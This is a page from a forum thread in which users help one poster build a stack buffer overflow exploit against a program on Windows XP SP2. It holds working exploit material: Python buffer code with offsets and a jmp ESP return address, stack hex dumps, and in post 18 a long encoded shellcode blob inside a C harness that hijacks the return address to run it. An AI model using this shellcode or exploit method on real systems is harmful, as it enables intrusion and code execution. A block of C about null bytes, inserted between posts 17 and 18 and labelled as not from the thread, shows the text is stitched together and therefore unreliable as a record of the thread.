Page 2 of 3, results 11 to 20 of 22

Thread: help in writing exploits stack overflow on xp sp2

  1. #11
    Good friend of the forums
    Join Date: Jun 2008 | Posts: 425

    Also a Jump ECX will not work with Windows XP.
    I didn't know what the OP might mean by that; I just tested my way and it ran, but what is jump ECX and what's the difference between Linux and Windows (just an area I can google)?

    If you can, please try it on some XP SP2 machine and tell me where I'm going wrong.
    From XP SP3 to SP2 the only thing that should change is from 00400000 to another 00400000 if you used the code I posted. I would like to find out about this jmp ecx as I'm not too familiar with that and probably won't be able to help you in that regard.

    The first NOPs, I mean the beginning of the shellcode, are being pointed to by ECX
    I'm new to this compared to the old fellows here, but is it EIP or EBP?

    Which machine did you try? I find that after 524 bytes EIP is overwritten.
    Subtract 4 until EIP doesn't have \x90 in it, and then add a pointer/jmp to the NOPs at the start of the shellcode (if using OllyDbg, look at the bottom left).
    0022E020
    Those addresses (post #7) look like the heap, not the stack; look higher.

  2. #12
    Just burned his ISO
    Join Date: Jan 2007 | Posts: 9

    Can you please tell me why jmp ECX won't work on XP? If not, what else should I do?

  3. #13
    Moderator KMDave
    Join Date: Jan 2010 | Posts: 2,281

    I've got a working exploit for your source.

    It is quite simple.

    You went in the right direction also with your layout of the memory. But you should give your buffer a closer look. Check the registers again. Maybe you shouldn't jump to ECX but to some other register.
    Tiocfaidh ár lá

  4. #14
    Just burned his ISO
    Join Date: Jan 2007 | Posts: 9

    Yes, ESP is pointing to the buffer. EIP is overwritten at 524 and ESP points at the 528th byte. I use the following code to test. I find the total available space for shellcode is 932 bytes (after ESP). But after running the following code I find EIP overwritten by a stack address, 0022EC3D. I have pasted part of the hex dump. I have even tested with a few other jmp esp addresses but still not getting a result.

    buffer = "A" * 524 #junk data
    buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
    buffer += "B" * 4 #esp nops
    buffer += "C" * 928 #shellcode +nop
    buffer += '\r\n'
    print buffer

    hex dump
    ------------------------------------------
    0022EC1D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC25 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC2D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC35 41 41 41 41 41 41 41 5D AAAAAAA]
    0022EC3D 38 82 7C 42 42 42 42 43 8‚|BBBBC ----address pointed by eip
    0022EC45 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC4D 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC55 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC5D 43 43 43 43 43 43 43 43 CCCCCCCC

    I think EIP should contain the address of jmp esp. I have tried to use it with shellcode also but not getting the desired results. Am I going wrong somewhere? Can you please suggest how I should proceed further.

  5. #15
    Good friend of the forums
    Join Date: Jun 2008 | Posts: 425

    But after running the following code I find EIP overwritten by a stack address 0022EC3D
    buffer = "A" * 524 #junk data
    buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
    buffer += "B" * 4 #esp nops
    buffer += "C" * 928 #shellcode +nop
    buffer += '\r\n'
    print buffer

    hex dump
    ------------------------------------------
    0022EC1D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC25 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC2D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC35 41 41 41 41 41 41 41 5D AAAAAAA]
    0022EC3D 38 82 7C 42 42 42 42 43 8‚|BBBBC ----address pointed by eip
    0022EC45 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC4D 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC55 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC5D 43 43 43 43 43 43 43 43 CCCCCCCC

    buffer = "A" * 524 #junk data
    buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
    buffer += "\x45\xec\x22\x00"
    buffer += "C" * 928 #shellcode +nop
    buffer += '\r\n'

  6. #16
    Moderator KMDave
    Join Date: Jan 2010 | Posts: 2,281

    Try to use a different JMP ESP
    Tiocfaidh ár lá

  7. #17
    Very good friend of the forum Virchanza
    Join Date: Jan 2010 | Posts: 863

    Regarding "zero bytes":

    In the C programming language, and in many other programming languages, a string is a sequence of characters followed by a terminating null character. So for instance, if you had the string, "dog", it would be the following four bytes:

    1: The ASCII code for d
    2: The ASCII code for o
    3: The ASCII code for g
    4: The terminating null character (which is simply all bits zero)

    If you were to copy this string, for instance by using the "strcpy" function, then "strcpy" will stop copying when it encounters the terminating null character. This is where the problem lies. If your shell code contains a zero byte, then all string functions will stop reading at the zero byte. So if your shell code contains a zero byte, you need to improvise somehow to get rid of it (that's of course assuming that your shell code will be processed by a string-processing routine).
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
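The truncation Virchanza describes above, as an added example that is not code from the thread: two constructed byte buffers (one with a zero byte at index 3, one without), a scan that reports where the first zero byte sits, and the same bytes copied once with strcpy (string semantics) and once with memcpy (length semantics). All function and buffer names here are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample buffers (not from the thread): one with an embedded
 * zero byte at index 3, one with no zero byte at all. */
static const unsigned char with_zero[]    = { 0x41, 0x42, 0x43, 0x00, 0x44, 0x45, 0x46, 0x47 };
static const unsigned char without_zero[] = { 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48 };
#define WITH_ZERO_LEN    (sizeof with_zero)
#define WITHOUT_ZERO_LEN (sizeof without_zero)

/* Scratch destination shared by the copies below. */
static unsigned char scratch[64];

/* Index of the first zero byte in buf, or -1 if there is none. This is the
 * check to run on any byte blob before it reaches code that treats it as a
 * C string: a 0x00 anywhere inside means the string routines stop there. */
int first_zero_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0)
            return (int)i;
    }
    return -1;
}

/* Copies src into dst the way a string routine would (strcpy) and returns
 * how many bytes arrived. A temporary copy with a guaranteed terminator
 * keeps strcpy from reading past src when src contains no zero byte. */
size_t copy_as_string(const unsigned char *src, size_t len,
                      unsigned char *dst, size_t dst_cap)
{
    char tmp[256];
    if (len >= sizeof tmp || dst_cap <= len)
        return 0;
    memcpy(tmp, src, len);
    tmp[len] = '\0';
    strcpy((char *)dst, tmp);          /* stops at the first 0x00, wherever it is */
    return strlen((char *)dst);
}

/* Copies src into dst by length (memcpy) and returns how many bytes arrived
 * intact; a zero byte is just data here, nothing is cut short. */
size_t copy_as_bytes(const unsigned char *src, size_t len,
                     unsigned char *dst, size_t dst_cap)
{
    if (dst_cap < len)
        return 0;
    memcpy(dst, src, len);
    return memcmp(dst, src, len) == 0 ? len : 0;
}

int main(void)
{
    printf("first zero byte in with_zero:    %d\n",
           first_zero_byte(with_zero, WITH_ZERO_LEN));
    printf("first zero byte in without_zero: %d\n",
           first_zero_byte(without_zero, WITHOUT_ZERO_LEN));
    printf("strcpy delivered %zu of %zu bytes\n",
           copy_as_string(with_zero, WITH_ZERO_LEN, scratch, sizeof scratch), WITH_ZERO_LEN);
    printf("memcpy delivered %zu of %zu bytes\n",
           copy_as_bytes(with_zero, WITH_ZERO_LEN, scratch, sizeof scratch), WITH_ZERO_LEN);
    return 0;
}
```

The two copy functions take identical input; only the copying primitive differs. With the zero byte present, strcpy delivers 3 bytes and memcpy delivers all 8, which is exactly the silent truncation the post warns about, and why a length-based copy (or a scan like first_zero_byte before the data is handed to string code) is what keeps a byte blob intact.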

  8. #18
    Just burned his ISO
    Join Date: Jan 2007 | Posts: 9

    I have tested the shellcode using the following. It works as it should. I don't think a null byte is there.

    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>

    /* Shellcode under test, as a C string literal. */
    char shellcode[]=
    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
    "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\x6d\xc6\xd5\x42"
    "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\xfd\x3e\xc5\x36"
    "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\x6b\x0e\xea\x24"
    "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\xbe\x6b\x0e\x95"
    "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\xda\x23\x2b\x56"
    "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\x0e\x7c\x1a\x36"
    "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\xcb\x31\xc6\xed"
    "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\xda\x6b\xd5\x6d"
    "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\x04\xd2\x22\xbf"
    "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\x53\x6c\x79\xee"
    "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\xe3\x6c\xa3\x5c"
    "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\xd0\xc0\xfa\xd5"
    "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\x60\x76\xac\xf4"
    "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\xfc\xf9\x53\xea"
    "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\x0c\xda\x40\xed"
    "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\x2f\xc1\x68\x90"
    "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\x7b\x8c\x3c\x42"
    "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\xd4\x6e\x7f\xec"
    "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\x7a\x08\xd5\x6d"
    "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\x75\xb5\x2e\xe2"
    "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd";


    int main ()
    {
    int *ret;
    /* Two slots above the local: the saved return address of main on this
       32-bit, unprotected stack layout (the classic shellcode test harness). */
    ret=(int *)&ret+2;
    /* strlen stops at the first zero byte, so this length also confirms
       whether a null byte is present inside the shellcode. */
    printf("Shellcode Length is : %d\n",(int)strlen(shellcode));
    /* Point the saved return address at the shellcode so main returns into it. */
    (*ret)=(int)shellcode;
    return 0;
    }

  9. #19
    Moderator KMDave
    Join Date: Jan 2010 | Posts: 2,281

    As there is no badchar I don't know why it shouldn't work.

    Could you please tell us what the exact problem is atm?
    Tiocfaidh ár lá

  10. #20
    Just burned his ISO
    Join Date: Jan 2007 | Posts: 9

    Quote Originally Posted by KMDave
    Try to use a different JMP ESP

    Hi, I still have the problem with other jmp esp addresses. I am not able to find what's wrong. I don't think I have done any wrong calculation regarding offsets and other things. Can you please guide me further.
